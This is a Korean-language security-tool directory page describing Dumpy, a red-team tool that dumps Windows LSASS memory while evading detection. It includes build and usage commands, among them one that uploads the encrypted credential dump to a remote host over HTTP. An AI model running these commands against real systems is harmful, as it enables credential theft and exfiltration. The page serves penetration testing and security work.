Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Dumpy — 열린 핸들을 재사용하여 LSASS를 동적으로 덤프합니다. | Kitploit
도구/GitHubGitHub/kudaes/dumpy
ExploitationIDS/IPS EvasionData ExfiltrationPost-ExploitationPenetration TestingRed Teaming
GitHubkudaes/dumpy

Dumpy

열린 핸들을 재사용하여 LSASS를 동적으로 덤프합니다.

저장소 보기
246262년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

설명

이 도구는 MiniDumpWriteDump를 동적으로 호출하여 lsass 메모리 콘텐츠를 덤프합니다. 이 과정은 lsass에 대한 새 프로세스 핸들을 열지 않고 수행되며, 악성 동작 탐지를 더 어렵게 만들기 위해 DInvoke_rs를 사용합니다. lsass에 대해 OpenProcess를 호출하지 않고 유효한 프로세스 핸들을 얻기 위해, 시스템의 모든 프로세스 핸들은 NtQuerySystemInformation, NtDuplicateObject, NtQueryObject 및 QueryFullProcessImageNameW를 사용하여 분석됩니다.

메모리 덤프를 디스크에 저장하거나 HTTP를 통해 전송하기 전에 XOR 처리하기 위해 NTFS 트랜잭션이 사용됩니다.

x86 및 x64 모두 지원이 추가되었습니다.

컴파일

release 모드로 코드를 컴파일하고 실행하기만 하면 됩니다:

root@kitploit:~
C:\Users\User\Desktop\Dumpy\dumpy> cargo build --release
C:\Users\User\Desktop\Dumpy\dumpy\target\x86_64-pc-windows-msvc\release> dumpy.exe -h

x86 시스템용으로 도구를 컴파일하려는 경우 .cargo\config 파일에서 "target" 옵션의 값을 수정하세요(예: target = "i686-pc-windows-msvc").

사용법

root@kitploit:~
Usage: dumpy.exe --dump|--decrypt [options]

Options:
    -h, --help          Print this help menu.
        --dump          Dump lsass.
        --decrypt       Decrypt a previously generated dump file.
    -f, --force         Force seclogon's service to leak a lsass handle
                        through a race condition.
    -k, --key           Encryption key [default: 1234abcd]
    -i, --input         Encrypted dump file [default: c:\temp\input.txt]
    -o, --output        Destination path [default: c:\temp\output.txt]
    -u, --upload        Upload URL

Dumpy에는 두 가지 주요 작업이 있습니다:

  • dump: lsass를 덤프하는 주요 로직을 실행합니다. 기본적으로 결과는 현재 디렉터리에 임의의 이름을 가진 XOR 처리된 텍스트 파일로 저장됩니다. upload 옵션을 사용하면 메모리 콘텐츠를 HTTP를 통해 원격 호스트로 전송하여 XOR 처리된 파일이 디스크에 생성되는 것을 방지할 수 있습니다. 업로드를 처리하기 위해 이 간단한 HTTP 서버를 사용했습니다만, multipart/form-data 요청을 지원하는 다른 HTTP 서버도 모두 작동합니다.

    C:\Temp> dumpy.exe --dump -k secretKey -u http://remotehost/upload

Antonio Cocomazzi가 이 게시물에서 설명한 seclogon 서비스의 경쟁 조건(race condition)을 통해 lsass에 대한 핸들 누출을 강제하려면 force 옵션을 사용하세요:

root@kitploit:~
C:\Temp> dumpy.exe --dump -k secretKey -u http://remotehost/upload --force
  • decrypt: 이 작업은 Mimikatz와 같은 도구가 기대하는 것과 동일한 형식으로 복호화된 메모리 덤프를 얻을 수 있게 합니다. 인수로 XOR 처리된 메모리 덤프, 암호화 키 및 출력 파일 경로를 요구합니다. XOR 처리된 파일이 HTTP를 통해 업로드된 경우, 이 복호화 과정 전에 콘텐츠에 대한 base64 디코딩을 수행해야 합니다.

    C:\Temp> dumpy.exe --decrypt -i xored.txt -o decrypted.txt -k secretKey

도구 다운로드